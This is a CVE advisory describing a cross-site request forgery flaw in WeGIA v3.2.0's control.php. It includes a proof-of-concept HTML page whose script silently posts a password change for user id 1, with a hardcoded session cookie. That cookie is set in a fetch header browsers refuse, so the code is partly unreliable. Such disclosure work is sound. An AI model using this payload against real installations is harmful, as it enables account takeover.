One minute
CVE-2024-53472:CSRF in control.php to change password WeGIA
CVE-2024-53472:CSRF in control.php to change password
Vendor
WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.
Affected Product Code Base
WeGIA - v3.2.0
Vulnerability Description
A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.
POC
This code allows an attacker to change the password of an authenticated user without their consent by loading this malicious page while the user is logged into the application.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit</title>
</head>
<body>
<script>
fetch("https://demo.wegia.org/controle/control.php", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "_ga=GA1.1.1228908965.1730558983; PHPSESSID=1g73rg3pd1gp28a54amciflj9d; _ga_F8DXBXLV8J=GS1.1.1730838076.2.1.1730838109.27.0.0"
},
body: "senha_antiga=wegia&nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
</script>
</body>
</html>
Reference
https://github.com/nilsonLazarin/WeGIA/issues/790
https://github.com/nilsonmori/WeGIA
Discoverer
Natan Maia Morette and Diego Cardoso Borda Castro, Nov 2024.